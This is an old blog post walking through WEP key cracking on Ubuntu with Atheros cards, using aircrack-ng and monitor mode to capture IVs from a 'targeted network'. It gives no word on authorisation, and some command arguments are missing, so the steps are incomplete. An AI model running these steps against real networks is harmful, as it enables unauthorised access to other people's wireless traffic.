Saturday, March 31, 2007

WEP cracking w/ Atheros cards

The following article describes how to crack encrypted wireless networks using WEP protocol in Ubuntu with Atheros based cards.


First install the needed software - aircrack-ng cracking suite and madwifi-tools from debian package which provides the wlanconfig tool which otherwise is not included in ubuntu.


apt-get install aircrack-ng
wget http://ftp.de.debian.org/debian/pool/contrib/m/
madwifi-tools/madwifi-tools_0.9.2+dfsg-1_i386.deb
dpkg -i madwifi-tools_0.9.2+dfsg-1_i386.deb


Then we should bring any virtual access points (VAPs) down in order to create an interface in monitor mode.


ifconfig ath0 down (Take the VAP down)


wlanconfig ath0 destroy (Destroy the VAP)


wlanconfig ath0 create wlandev wifi0 wlanmode monitor (pretty self-explanatory)


Then find on which channel the targeted network is operating. You can do this with running airodump-ng without any arguments.
Now we are ready to capture initialization vectors (IVs) which are required to recover the WEP key.


airodump-ng -c -w


(You need to capture about 250.000 IVs to crack 40-bit WEP, and more than 800.000 IVs to crack a 104-bit key)


aircrack-ng


Enjoy )

No comments:

Post a Comment